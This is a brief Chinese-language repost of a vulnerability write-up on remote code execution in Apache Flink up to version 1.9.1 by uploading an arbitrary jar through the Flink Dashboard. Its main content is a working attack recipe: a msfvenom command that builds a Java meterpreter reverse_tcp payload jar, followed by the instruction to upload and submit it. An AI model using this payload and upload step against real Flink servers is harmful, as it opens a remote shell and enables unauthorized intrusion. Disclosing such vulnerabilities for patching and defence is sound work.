Apache Flink 任意 Jar 包上传致 RCE

Apache Flink 任意 Jar 包上传致 RCE
2019-11-22 10:46:50 Author: mp.weixin.qq.com(查看原文) 阅读量:91 收藏

漏洞概述：

Flink核心是一个流式的数据流执行引擎，其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能；漏洞影响：至目前最新版本Apache Flink 1.9.1；攻击者可直接在Apache Flink Dashboard页面中上传任意jar包，从而达到远程代码执行的目的

环境：
下载http://mirrors.tuna.tsinghua.edu ... -bin-scala_2.11.tgz

解压后访问8081端口

msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f jar > rce.jar

上传后点击 Submit

微信公众号文章素材之分割线大全

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650458112&idx=3&sn=b73d57f47f33cd61cbf67994daf093c5&chksm=83bbade4b4cc24f2c4e640deec68e5ca45720c2e56c791d9db6c7d8363661bb0bc9e8f56686c#rd
如有侵权请联系:admin#unsafe.sh